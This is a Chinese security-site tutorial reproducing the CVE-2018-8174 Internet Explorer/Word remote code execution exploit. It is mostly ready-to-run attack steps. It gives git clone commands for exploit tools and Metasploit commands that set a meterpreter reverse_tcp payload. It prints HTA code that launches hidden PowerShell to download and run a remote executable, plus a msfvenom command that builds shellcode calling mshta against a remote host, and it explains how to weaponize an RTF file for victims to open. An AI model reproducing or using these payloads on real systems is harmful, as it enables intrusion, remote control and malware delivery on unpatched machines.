ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全工具 → CVE-2018-8174 0day漏洞复现
CVE-2018-8174 0day漏洞复现

CVE-2018-8174 0day漏洞复现

评分:0.0
下载地址
  • 软件介绍
  • 软件截图
  • 同类推荐
  • 相关文章

软件Tags: [db:tag]

POC验证

未打补丁系统,IE浏览器打开此地址会弹出计算器 。

http://test.cesafe.com/CVE-2018-8174_PoC.html

CVE-2018-8174 0day漏洞复现

Metasploit验证

 
  1. 下载 metasploit 模块到本地
  2. git clone https://github.com/0x09AL/CVE-2018-8174-msf.git
  3.  
  4. 将CVE-2018-8174.rb复制到 fileformat 目录
  5. cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
  6.  
  7. 将CVE-2018-8174.rtf复制到 exploits 目录
  8. cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

启动 metasploit

 
  1. use exploit/windows/fileformat/CVE-2018-8174
  2. set PAYLOAD windows/meterpreter/reverse_tcp
  3. set srvhost test.cesafe.com
  4. set lhost test.cesafe.com
  5. exploit

复制 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开

或者IE浏览器打开 http://test.cesafe.com:8080 即可获得会话

自定义下载者 复现

利用 mshta 从远程服务器下载文件执行。

https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg ci8h

构造HTA文件,使用powershell下载文件至临时目录执行

准备你的test.exe文件上传至站点目录,假如得到地址 http://www.cesafe.com/test.exe

HTA代码:

  1. <script>
  2. a=new ActiveXObject("WScript.Shell");
  3. a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://xxx.com/xxx.exe\', \'c:/windows/temp/cesafe.exe\'); c:/windows/temp/cesafe.exe', 0);window.close();
  4. </script>

把该文件命名 666.hta 上传至站点目录;假如得到地址 http://test.cesafe.com/666.hta

使用msfvenom生成 js Shellcode

  1. msfvenom -p windows/exec cmd='mshta http://test.cesafe.com/666.hta' -f js_le exitfunc=thread -a x86

把生成的Shellcode字符替换至 666poc.html 166行代码

把 666poc.html 文件上传至站点目录 假如得到地址 http://test.cesafe.com/666poc.html

生成Word文档

下载python脚本保存本地

  1. git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

运行 CVE-2018-8174.py

  1. python CVE-2018-8174.py -u http://test.cesafe.com/666poc.html -o exp.rtf

得到目录中的 “exp.rtf ”文件,使用Word文档打开即可下载执行文件,

或者IE浏览器打开 http://test.cesafe.com/666poc.html 即可下载执行cesafe.exe文件

展开内容

软件截图

下载地址

  • PC版

推荐文章

用户评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网